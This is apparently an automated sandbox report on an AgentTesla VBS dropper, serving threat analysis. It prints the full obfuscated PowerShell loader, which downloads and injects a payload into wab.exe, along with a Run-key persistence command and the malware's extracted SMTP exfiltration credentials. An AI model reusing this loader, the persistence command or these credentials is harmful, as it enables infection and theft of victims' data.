Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19-06-2024 14:56
Static task
static1
Behavioral task
behavioral1
Sample
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
Resource
win10v2004-20240226-en
General
-
Target
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
-
Size
91KB
-
MD5
44d9ad2f0db6d4cb899d6657974c817b
-
SHA1
1a76e0f99bffc9a92c8578f87538f2efb2b94ec9
-
SHA256
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
-
SHA512
09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b
-
SSDEEP
1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.myhydropowered.com - Port:
587 - Username:
[email protected] - Password:
n8h0yvDxAKrtxKB - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 9 1284 powershell.exe 11 1284 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exewab.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 72 ip-api.com 70 api.ipify.org 71 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid Process 3412 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid Process 4232 powershell.exe 3412 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 4232 set thread context of 3412 4232 powershell.exe 105 -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exewab.exepid Process 1284 powershell.exe 1284 powershell.exe 4232 powershell.exe 4232 powershell.exe 4232 powershell.exe 4232 powershell.exe 3412 wab.exe 3412 wab.exe 3412 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 4232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid Process Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 3412 wab.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid Process procid_target PID 3452 wrote to memory of 1284 3452 WScript.exe 91 PID 3452 wrote to memory of 1284 3452 WScript.exe 91 PID 1284 wrote to memory of 3420 1284 powershell.exe 93 PID 1284 wrote to memory of 3420 1284 powershell.exe 93 PID 1284 wrote to memory of 4232 1284 powershell.exe 98 PID 1284 wrote to memory of 4232 1284 powershell.exe 98 PID 1284 wrote to memory of 4232 1284 powershell.exe 98 PID 4232 wrote to memory of 632 4232 powershell.exe 102 PID 4232 wrote to memory of 632 4232 powershell.exe 102 PID 4232 wrote to memory of 632 4232 powershell.exe 102 PID 4232 wrote to memory of 3412 4232 powershell.exe 105 PID 4232 wrote to memory of 3412 4232 powershell.exe 105 PID 4232 wrote to memory of 3412 4232 powershell.exe 105 PID 4232 wrote to memory of 3412 4232 powershell.exe 105 PID 4232 wrote to memory of 3412 4232 powershell.exe 105 PID 3412 wrote to memory of 3312 3412 wab.exe 107 PID 3412 wrote to memory of 3312 3412 wab.exe 107 PID 3412 wrote to memory of 3312 3412 wab.exe 107 PID 3312 wrote to memory of 1704 3312 cmd.exe 109 PID 3312 wrote to memory of 1704 3312 cmd.exe 109 PID 3312 wrote to memory of 1704 3312 cmd.exe 109
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"3⤵PID:3420
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"4⤵PID:632
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"5⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
